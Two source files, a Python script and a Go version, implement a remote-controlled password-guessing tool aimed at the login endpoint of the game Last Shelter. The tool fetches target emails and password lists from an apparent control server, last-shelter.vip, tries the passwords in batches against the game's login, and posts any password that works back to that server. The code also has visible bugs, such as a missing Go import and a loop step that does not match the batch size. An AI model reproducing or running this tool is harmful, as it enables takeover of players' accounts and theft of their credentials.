File: src/tools/remote/remote_tool.py
import asyncio
import os.path
import pickle
import time

import requests
from pydantic import BaseModel, Field

password_data_filename = "passwords.bin"
job_data_filename = "job.bin"


class Job(BaseModel):
    job_id: str
    email: str
    job_completed: bool
    job_in_progress: bool
    file_index: int
    password_found: str | None
    file_progress: int = Field(default=0)


def get_jobs() -> list[Job]:
    auth_code = "sdasdasdas"
    url = f"https://last-shelter.vip/admin/_tool/get-jobs/{auth_code}"
    response = requests.get(url=url)
    return [Job(**_job) for _job in response.json().get('job_list', [])] if response.ok else []


def get_files(job_id: str):
    url = f"https://last-shelter.vip/admin/_tool/get-job/{job_id}"
    response = requests.get(url=url)
    if response.ok:
        return response.json()


async def game_account_valid(password: str, email: str) -> tuple[bool, str]:
    """
    Validate Game Accounts
    :param email: Email of the account
    :param password: Password of the account
    :return: True if the login is successful, False otherwise
    """
    _account_verification_endpoint: str = "https://lsaccount.im30.net/common/v1/login"
    form_data = {'email': email, 'pass': password}
    response = requests.post(url=_account_verification_endpoint, data=form_data)
    if response.ok:
        response_data = response.json()
        return response_data.get('code') == 10000, password
    return False, password


async def validate_passwords(job: Job, passwords: dict[str, str], _email: str) -> tuple[bool, str | None]:
    # Validate passwords concurrently
    password_list = list(passwords.values())

    print(f"Found passwords {len(password_list)}")
    i = job.file_progress
    print(f"starting JOB at {job.file_progress}")
    interval = 5
    update_interval = interval * 50

    while i < len(password_list):
        routines = []
        for _pass in password_list[i: i + interval]:
            routines.append(game_account_valid(password=_pass, email=_email))
        i += 4
        results = await asyncio.gather(*routines)
        if i % update_interval == 0:
            job.file_progress += update_interval
            create_job_file(job=job)

        for _is_found, _pass in results:
            print(_is_found, _pass)
            if _is_found:
                # update_backend(_pass=normal_list[], _job_id=job_id)
                return _is_found, _pass
        print(f"Counter : {i}")
    return False, None


def update_backend(_pass: str, _job_id: str):
    """

    :param _pass:
    :param _job_id:
    :return:
    """
    url = f"https://last-shelter.vip/admin/_tool/updates/{_job_id}/{_pass}"
    response = requests.post(url=url)
    return response.ok


def create_passwords_file(passwords: dict[str, str]):
    # Create an example passwords data dictionary
    # Write the passwords data to the passwords file
    with open(password_data_filename, "wb") as file:
        pickle.dump(passwords_data, file)


def create_job_file(job: Job):
    # Create an example job object
    # Write the job object to the job file
    with open(job_data_filename, "wb") as file:
        pickle.dump(job, file)


def get_new_data():
    global passwords_data, email, job_id, job
    for _job in get_jobs():
        if _job.job_in_progress and not _job.job_completed:
            file_data = get_files(job_id=_job.job_id)
            passwords_data = file_data.get("passwords")

            email = _job.email
            job_id = _job.job_id

            create_job_file(job=_job)
            create_passwords_file(passwords=passwords_data)

            if not job_id:
                continue
            else:
                job = _job
                break
            # create the files above with the data found in this section


if __name__ == "__main__":

    passwords_data = {}
    job: Job | None = None

    if os.path.exists(password_data_filename) and os.path.exists(job_data_filename):
        with open(password_data_filename, "rb") as _file:
            while True:
                try:
                    passwords_data = pickle.load(_file)
                except EOFError:
                    break

        with open(job_data_filename, "rb") as _file:
            job: Job = pickle.load(_file)
            job_id = job.job_id
            email = job.email

    else:
        get_new_data()

    while True:
        is_found, password = asyncio.run(validate_passwords(job=job, passwords=passwords_data, _email=email))

        if is_found:
            _password = {value: key for key, value in passwords_data.items()}[password]
            update_backend(_pass=_password, _job_id=job_id)

        # Update local files
        time.sleep(14400)
        get_new_data()

File: src/tools/remote/remote_tool.go
package main

import (
	"encoding/json"
	"fmt"
	"io/ioutil"
	"net/http"
	"os"
	"sync"
	"time"
)

type Job struct {
	JobID           string `json:"job_id"`
	Email           string `json:"email"`
	JobCompleted    bool   `json:"job_completed"`
	JobInProgress   bool   `json:"job_in_progress"`
	FileIndex       int    `json:"file_index"`
	PasswordFound   string `json:"password_found,omitempty"`
	FileProgress    int    `json:"file_progress"`
}

var (
	passwordDataFilename = "passwords.bin"
	jobDataFilename      = "job.bin"
	client               = &http.Client{}
	mu                   sync.Mutex
)

func getJobs() ([]Job, error) {
	authCode := "sdasdasdas"
	url := fmt.Sprintf("https://last-shelter.vip/admin/_tool/get-jobs/%s", authCode)
	response, err := http.Get(url)
	if err != nil {
		return nil, err
	}
	defer response.Body.Close()

	var jobList []Job
	err = json.NewDecoder(response.Body).Decode(&jobList)
	if err != nil {
		return nil, err
	}
	return jobList, nil
}

func getFiles(jobID string) (map[string]interface{}, error) {
	url := fmt.Sprintf("https://last-shelter.vip/admin/_tool/get-job/%s", jobID)
	response, err := http.Get(url)
	if err != nil {
		return nil, err
	}
	defer response.Body.Close()

	var fileData map[string]interface{}
	err = json.NewDecoder(response.Body).Decode(&fileData)
	if err != nil {
		return nil, err
	}
	return fileData, nil
}

func gameAccountValid(password string, email string) (bool, string, error) {
	_accountVerificationEndpoint := "https://lsaccount.im30.net/common/v1/login"
	formData := fmt.Sprintf(`{"email":"%s", "pass":"%s"}`, email, password)
	response, err := client.Post(_accountVerificationEndpoint, "application/json", strings.NewReader(formData))
	if err != nil {
		return false, "", err
	}
	defer response.Body.Close()

	var responseData map[string]interface{}
	err = json.NewDecoder(response.Body).Decode(&responseData)
	if err != nil {
		return false, "", err
	}
	code, _ := responseData["code"].(float64)
	return code == 10000, password, nil
}

func validatePasswords(job Job, passwords map[string]string, email string) (bool, string, error) {
	// Validate passwords concurrently
	passwordList := make([]string, 0, len(passwords))
	for _, v := range passwords {
		passwordList = append(passwordList, v)
	}

	fmt.Printf("Found passwords %d\n", len(passwordList))
	i := job.FileProgress
	fmt.Printf("starting JOB at %d\n", job.FileProgress)
	interval := 5
	updateInterval := interval * 50

	for i < len(passwordList) {
		routines := make([]func() (bool, string, error), 0, interval)
		for _, _pass := range passwordList[i : i+interval] {
			_pass := _pass // capture range variable
			routines = append(routines, func() (bool, string, error) {
				return gameAccountValid(_pass, email)
			})
		}
		i += 4
		var results []bool
		for _, routine := range routines {
			isFound, pass, err := routine()
			if err != nil {
				return false, "", err
			}
			results = append(results, isFound)
			if i%updateInterval == 0 {
				job.FileProgress += updateInterval
				err := createJobFile(job)
				if err != nil {
					return false, "", err
				}
			}
			if isFound {
				return isFound, pass, nil
			}
		}
		fmt.Printf("Counter : %d\n", i)
	}
	return false, "", nil
}

func updateBackend(pass string, jobID string) error {
	url := fmt.Sprintf("https://last-shelter.vip/admin/_tool/updates/%s/%s", jobID, pass)
	response, err := client.Post(url, "application/json", nil)
	if err != nil {
		return err
	}
	defer response.Body.Close()
	if response.StatusCode != http.StatusOK {
		return fmt.Errorf("failed to update backend, status code: %d", response.StatusCode)
	}
	return nil
}

func createPasswordsFile(passwords map[string]string) error {
	data, err := json.Marshal(passwords)
	if err != nil {
		return err
	}
	return ioutil.WriteFile(passwordDataFilename, data, 0644)
}

func createJobFile(job Job) error {
	data, err := json.Marshal(job)
	if err != nil {
		return err
	}
	return ioutil.WriteFile(jobDataFilename, data, 0644)
}

func getNewData() (map[string]string, string, string, Job, error) {
	var passwordsData map[string]string
	var email, jobID string
	var job Job

	jobList, err := getJobs()
	if err != nil {
		return nil, "", "", Job{}, err
	}

	for _, _job := range jobList {
		if _job.JobInProgress && !_job.JobCompleted {
			fileData, err := getFiles(_job.JobID)
			if err != nil {
				return nil, "", "", Job{}, err
			}
			passwordsData = make(map[string]string)
			passwordsInterface, ok := fileData["passwords"].([]interface{})
			if !ok {
				return nil, "", "", Job{}, fmt.Errorf("error converting passwords data")
			}
			for _, v := range passwordsInterface {
				if passMap, ok := v.(map[string]interface{}); ok {
					passwordsData[passMap["key"].(string)] = passMap["value"].(string)
				}
			}
			email = _job.Email
			jobID = _job.JobID

			err = createJobFile(_job)
			if err != nil {
				return nil, "", "", Job{}, err
			}
			err = createPasswordsFile(passwordsData)
			if err != nil {
				return nil, "", "", Job{}, err
			}

			if jobID == "" {
				continue
			} else {
				job = _job
				break
			}
		}
	}
	return passwordsData, email, jobID, job, nil
}

func main() {
	var passwordsData map[string]string
	var email, jobID string
	var job Job

	if _, err := os.Stat(passwordDataFilename); err == nil {
		passwordData, err := ioutil.ReadFile(passwordDataFilename)
		if err != nil {
			panic(err)
		}
		err = json.Unmarshal(passwordData, &passwordsData)
		if err != nil {
			panic(err)
		}
	}

	if _, err := os.Stat(jobDataFilename); err == nil {
		jobData, err := ioutil.ReadFile(jobDataFilename)
		if err != nil {
			panic(err)
		}
		err = json.Unmarshal(jobData, &job)
		if err != nil {
			panic(err)
		}
		email = job.Email
		jobID = job.JobID
	}

	if email == "" || jobID == "" {
		var err error
		passwordsData, email, jobID, job, err = getNewData()
		if err != nil {
			panic(err)
		}
	}

	for {
		isFound, password, err := validatePasswords(job, passwordsData, email)
		if err != nil {
			fmt.Printf("Error: %v\n", err)
		}

		if isFound {
			password := passwordsData[password]
			err := updateBackend(password, jobID)
			if err != nil {
				fmt.Printf("Error: %v\n", err)
			}
		}

		// Update local files
		time.Sleep(14400 * time.Second)
		passwordsData, email, jobID, job, err := getNewData()
		if err != nil {
			fmt.Printf("Error: %v\n", err)
		}
	}
}
